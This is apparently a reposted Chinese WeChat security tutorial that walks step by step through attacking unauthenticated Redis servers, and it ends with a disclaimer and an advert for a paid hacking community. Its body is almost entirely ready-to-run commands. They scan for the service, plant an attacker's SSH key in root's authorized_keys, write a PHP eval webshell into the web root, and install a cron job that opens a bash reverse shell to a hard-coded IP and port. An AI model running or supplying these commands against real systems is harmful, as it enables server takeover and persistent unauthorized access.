声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
01
漏洞探测
redis默认情况是空密码连接而且如果是root权限的话,会造成很大的危害。
Namp
nmap -sV -p6379 -Pn ip
Nuclei
nuclei.exe -u ip
02
未授权登录
当扫描发现主机端口对应的服务地址后,使用本地Redis客户端连接服务器获取敏感数据了。
redis-cli -h ip
03
写入SSH公钥
在攻击机中生成ssh公钥和私钥,密码设置为空
ssh-keygen -t rsa
cd /root/.ssh
id_rsa 是私钥文件,id_rsa.pub是公钥文件,现在需要将公钥文件上传到redis服务器上,通过私钥文件连接。
cat id_rsa.pub //查询公钥里面的内容
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9RP06xy1QBknlEBqIGwFZ7hecRtgyEIu1xYABNiJe1SalSJHrk4WMb3QVdZMNoGB5A3dnd/fgNzISRKDxG2W5XSnlCVaKZCVA9OBmPfrw4IUAkBjJZlcSafQSQJEm2VRRmkmMxutI5uTTHcAFke/WdEBi75QfJ+XZz8MdW8MJy7Z1JqF7GI9yUShQPOEYfF0UaMzho49m0PpieD9wI/2pilJSMzA98hQtyUMEhyWe5DQ2dzq/lnMwsYHdqA/Quh6Q3kH647iMJIXz5LZDrcVz0ERbOAm3M6FCSF6HNSfQPPZzRgVQEnSzdrL6xruvH8hAT+khk8B5NlicRTYJ7wQ64tSug9HmAbvq8DnmJ8+b0N0EEy7ooMXs8XEvkQzfRsIjKSYeT9650C/kggTKLEdpLSqp/Qtdj6gIlncfWveAgkU2rznaDWmKDdQrrM6xSfbx0Xi/UYEkjPOcKJ72BpNV3ZwHhUu5lValEglyt0P6FcDdE607hjYC+WevwZbofsc= root@kali
更改redis备份路径为/root/.ssh,并修改上传公钥文件的名称为 authorized_keys
./redis-cli -h ip
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9RP06xy1QBknlEBqIGwFZ7hecRtgyEIu1xYABNiJe1SalSJHrk4WMb3QVdZMNoGB5A3dnd/fgNzISRKDxG2W5XSnlCVaKZCVA9OBmPfrw4IUAkBjJZlcSafQSQJEm2VRRmkmMxutI5uTTHcAFke/WdEBi75QfJ+XZz8MdW8MJy7Z1JqF7GI9yUShQPOEYfF0UaMzho49m0PpieD9wI/2pilJSMzA98hQtyUMEhyWe5DQ2dzq/lnMwsYHdqA/Quh6Q3kH647iMJIXz5LZDrcVz0ERbOAm3M6FCSF6HNSfQPPZzRgVQEnSzdrL6xruvH8hAT+khk8B5NlicRTYJ7wQ64tSug9HmAbvq8DnmJ8+b0N0EEy7ooMXs8XEvkQzfRsIjKSYeT9650C/kggTKLEdpLSqp/Qtdj6gIlncfWveAgkU2rznaDWmKDdQrrM6xSfbx0Xi/UYEkjPOcKJ72BpNV3ZwHhUu5lValEglyt0P6FcDdE607hjYC+WevwZbofsc= root@kalinnn"
save
exit
ssh -i id_rsa root@ip
04
写入一句话木马
如果该服务器上部署网站的话可以通过写入一句话木马的方式进行攻击
config set dir /var/www/html/ // 必须知道网站目录
config set dbfilename shell.php
set x "eval($_POST['cmd']); "
或者:
set shell "rnrneval($_POST['cmd']); rnrn" @
save
exit
用蚁剑连接
连接成功!
05
反弹shell
nc -lvnp 4444
redis-cli -h ip #登陆到redis数据库
set xx "n* * * * * bash -i >& /dev/tcp/192.168.112.128/4444 0>&1n"
config set dir /var/spool/cron #设置工作目录
config set dbfilename root #设置文件名,当前用户叫啥就得命名为啥,当前用户为root
save #保存
exit
06
fscan内网利用
写入SSH公钥
./fscan_amd64 -h ip -np -nopoc -no -rf id_rsa.pub -m redis
ssh -i id_rsa root@ip
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
推荐阅读
原文始发于微信公众号(渗透安全团队):干货 | Redis的漏洞总结(建议收藏)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论